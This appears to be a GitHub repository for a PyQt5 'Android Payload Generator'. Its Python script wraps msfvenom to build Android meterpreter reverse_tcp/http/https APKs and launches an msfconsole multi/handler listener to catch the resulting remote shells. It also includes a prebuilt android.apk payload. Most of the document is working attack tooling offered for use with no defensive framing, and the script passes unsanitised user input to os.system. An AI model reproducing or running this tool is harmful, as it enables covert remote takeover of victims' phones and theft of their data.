├── README.md ├── payload_generater.ui ├── payloads └── android.apk ├── qt_payload_gen.py ├── requirements.txt └── sys /README.md: -------------------------------------------------------------------------------- 1 | # Android Payload Generator 2 | 3 | This tool helps to generate android payload with the help of QT5. It has a cool and simple graphical user interface which will make generating payload and listening for reverse shell easier. 4 | 5 | ![alt text](https://user-images.githubusercontent.com/14030703/82488946-e18afe80-9af1-11ea-9792-4b4a0e0aef03.png) 6 | 7 | # Installation 8 | 9 | Payload Generator requires [Qt5](https://doc.qt.io/qtforpython/) to run. 10 | 11 | Install below dependencies. 12 | 13 | ```sh 14 | pip3 install --user pyqt5 15 | sudo apt-get install python3-pyqt5 16 | sudo apt-get install pyqt5-dev-tools 17 | sudo apt-get install qttools5-dev-tools 18 | pip install -r requirements.txt 19 | ``` 20 | 21 | Run by 22 | 23 | > python3 qt_payload_gen.py 24 | 25 | ### Plugins 26 | 27 | Payload generator is currently extended with the following plugins. Instructions on how to use them in your own application are linked below. 28 | 29 | | Plugin | Url | 30 | | ------ | ------ | 31 | | MSFVenom | https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom | 32 | | qt5 | https://doc.qt.io/qtforpython/ | 33 | -------------------------------------------------------------------------------- /payload_generater.ui: -------------------------------------------------------------------------------- 1 | 2 | 3 | MainWindow 4 | 5 | 6 | 7 | 0 8 | 0 9 | 596 10 | 376 11 | 12 | 13 | 14 | Android Payload Generator 15 | 16 | 17 | 18 | 19 | 20 | 21 | 6 22 | 23 | 24 | QLayout::SetDefaultConstraint 25 | 26 | 27 | 28 | 29 | 30 | 16777215 31 | 30 32 | 33 | 34 | 35 | Choose Payload 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 16777215 44 | 30 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 16777215 54 | 30 55 | 56 | 57 | 58 | LHOST 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 0 67 | 50 68 | 69 | 70 | 71 | 72 | 0 73 | 0 74 | 75 | 76 | 77 | 78 | 16777215 79 | 30 80 | 81 | 82 | 83 | Qt::ImhNoAutoUppercase|Qt::ImhNoPredictiveText 84 | 85 | 86 | true 87 | 88 | 89 | QTextEdit::NoWrap 90 | 91 | 92 | false 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 16777215 101 | 30 102 | 103 | 104 | 105 | LPORT 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 0 114 | 0 115 | 116 | 117 | 118 | 119 | 16777215 120 | 30 121 | 122 | 123 | 124 | Qt::ImhDigitsOnly 125 | 126 | 127 | true 128 | 129 | 130 | QTextEdit::NoWrap 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 16777215 139 | 30 140 | 141 | 142 | 143 | Payload Name 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 16777215 152 | 30 153 | 154 | 155 | 156 | true 157 | 158 | 159 | QTextEdit::NoWrap 160 | 161 | 162 | 163 | 164 | 165 | 166 | 167 | 16777215 168 | 30 169 | 170 | 171 | 172 | 173 | 0 174 | 0 175 | 176 | 177 | 178 | Generate Payload 179 | 180 | 181 | 182 | 183 | 184 | 185 | 186 | 0 187 | 30 188 | 189 | 190 | 191 | 192 | 16777215 193 | 30 194 | 195 | 196 | 197 | Listen 198 | 199 | 200 | 201 | 202 | 203 | 204 | 205 | 206 | 207 | 208 | 209 | 0 210 | 0 211 | 596 212 | 25 213 | 214 | 215 | 216 | 217 | 218 | 219 | 220 | -------------------------------------------------------------------------------- /payloads/android.apk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/webnizam/android-payload-generator/43ec690bffad27cddfec3111db8f9fdcd2fb3e6a/payloads/android.apk -------------------------------------------------------------------------------- /qt_payload_gen.py: -------------------------------------------------------------------------------- 1 | import sys 2 | from PyQt5 import QtCore, QtGui, QtWidgets 3 | from PyQt5 import uic 4 | from PyQt5.QtWidgets import QMessageBox 5 | import os, subprocess 6 | 7 | values = [ 8 | 'android/meterpreter/reverse_tcp', 9 | 'android/meterpreter/reverse_http', 10 | 'android/meterpreter/reverse_https', 11 | ] 12 | 13 | generate_base_command = 'msfvenom -p %s LHOST=%s LPORT=%d R > %s' 14 | listen_base_command = ''' 15 | msfconsole -x "use exploit/multi/handler;\ 16 | set PAYLOAD %s;\ 17 | set LHOST %s;\ 18 | set LPORT %d;\ 19 | run" 20 | ''' 21 | 22 | 23 | def show_message(title='Error', info="", text='An Error Occured'): 24 | msg = QMessageBox() 25 | msg.setIcon(QMessageBox.Critical) 26 | msg.setText(text) 27 | msg.setInformativeText(info) 28 | msg.setWindowTitle(title) 29 | msg.exec_() 30 | 31 | class MainWindow(QtWidgets.QMainWindow): 32 | 33 | def __init__(self, *args, **kwargs): 34 | super().__init__(*args, **kwargs) 35 | uic.loadUi("payload_generater.ui", self) 36 | self.btnGeneratePayload.clicked.connect(self.click_generate) 37 | self.btnListen.clicked.connect(self.click_listen) 38 | self.payloadComboBox.addItems(values) 39 | self.output_dir = str(os.getcwd())+'/payloads/' 40 | print(self.output_dir) 41 | if not os.path.exists(self.output_dir): 42 | os.makedirs(self.output_dir) 43 | 44 | def click_generate(self): 45 | try: 46 | host = str(self.textHost.toPlainText()) 47 | host = host.replace('http://', '') 48 | host = host.replace('https://', '') 49 | port = str(self.textPort.toPlainText()) 50 | payload_name = str(self.textName.toPlainText()) 51 | if 'apk' not in payload_name: 52 | payload_name = payload_name+'.apk' 53 | payload_type = str(self.payloadComboBox.currentText()) 54 | if host and port and payload_name and payload_type: 55 | port = int(port) 56 | output_path = self.output_dir+payload_name 57 | command = generate_base_command % (payload_type, host, port, output_path) 58 | print(command) 59 | os.system(command) 60 | show_message(title='Success', text='Successfully generated payload, please find it at below path', info=self.output_dir) 61 | else: 62 | show_message(text='All fields are mandatory, please click generate after putting those.') 63 | 64 | except Exception as e: 65 | print(e) 66 | show_message(info=str(e)) 67 | 68 | def click_listen(self): 69 | try: 70 | host = str(self.textHost.toPlainText()) 71 | host = host.replace('http://', '') 72 | host = host.replace('https://', '') 73 | port = str(self.textPort.toPlainText()) 74 | payload_type = str(self.payloadComboBox.currentText()) 75 | if host and port and payload_type: 76 | port = int(port) 77 | command = listen_base_command % (payload_type, host, port) 78 | subprocess.call(["xterm", '-e', command]) 79 | # subprocess.call(['xterm', '-hold', '-e', command]) 80 | print(command) 81 | os.system(command) 82 | else: 83 | show_message(text='All fields are mandatory, please click generate after putting those.') 84 | 85 | except Exception as e: 86 | print(e) 87 | show_message(info=str(e)) 88 | 89 | 90 | def main(): 91 | app = QtWidgets.QApplication(sys.argv) 92 | main = MainWindow() 93 | main.show() 94 | sys.exit(app.exec_()) 95 | 96 | if __name__ == '__main__': 97 | main() 98 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | PyQt5==5.14.2 2 | pyqt5-tools==5.14.2.1.7b3 3 | --------------------------------------------------------------------------------